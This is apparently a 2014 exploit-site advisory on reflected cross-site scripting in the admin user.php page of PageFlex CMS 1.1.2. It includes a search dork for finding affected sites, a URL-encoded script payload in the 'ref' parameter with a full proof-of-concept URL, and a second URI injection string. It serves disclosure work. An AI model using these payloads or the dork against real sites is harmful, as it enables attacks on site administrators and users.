facebook facebook twitter rss

PageFlex CMS 1.1.2 Xss Vulnerability

Author: indoushka , Published: 25-10-2014
PageFlex CMS 1.1.2 Xss Vulnerability
====================================
Author : indoushka
Vondor : www.p30vel.ir
Dork : Copyright © 2014 by PageFlex
======================================
Cross site scripting (verified) :

This vulnerability affects /source/admin/user.php.
Discovered by: Scripting (XSS.script).
Attack details
URL encoded GET input ref was set to /source/admin/'"()&%<ScRiPt >prompt(913700)</ScRiPt>



http://127.0.0.1/source/admin/user.php?page=login&ref=/source/admin/%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28913700%29%3C/ScRiPt%3E

Cross site scripting :

This vulnerability affects /source/admin.
Discovered by: Scripting (XSS_in_URI.script).
Attack details
URI was set to ;915198'():;984309
The input is reflected inside <script> tag between single quotes

Like us on Facebook :